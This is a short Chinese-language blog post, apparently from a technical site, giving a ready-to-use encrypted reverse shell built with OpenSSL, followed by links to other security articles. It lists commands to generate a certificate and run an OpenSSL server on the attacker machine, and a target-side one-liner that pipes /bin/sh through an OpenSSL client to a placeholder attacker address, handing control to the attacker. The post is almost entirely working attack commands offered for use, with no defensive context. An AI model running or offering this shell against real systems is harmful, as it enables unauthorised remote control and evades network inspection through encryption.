使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
世界尽头与你2 小时前
(修复方案)CVE-2023-26111: node-static 路径遍历漏洞
安全·网络安全·渗透测试
ZZ583 小时前
mumu模拟器adb安装apk以及抓https包
网络安全
hellojackjiang20113 小时前
如何保障分布式IM聊天系统的消息可靠性(即消息不丢)
分布式·网络安全·架构·信息与通信
周某人姓周4 小时前
DOM型XSS案例
前端·安全·web安全·网络安全·xss
大方子6 小时前
【BugkuCTF】Whois
网络安全·bugkuctf
Whoami!7 小时前
⓫⁄₉ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 动态链接库(dll)文件劫持(上)
windows·网络安全·信息安全·dll劫持
汤愈韬16 小时前
ACL概述、ACL原理、基本ACL应用及配置
网络·网络协议·网络安全
青岑CTF20 小时前
攻防世界-Ics-05-胎教版wp
开发语言·安全·web安全·网络安全·php
Yff_world21 小时前
网络通信模型
学习·网络安全
Palpitate_LL1 天前
Mongoose 搜索注入漏洞 CVE-2024-53900 到 CVE-2025-23061
网络安全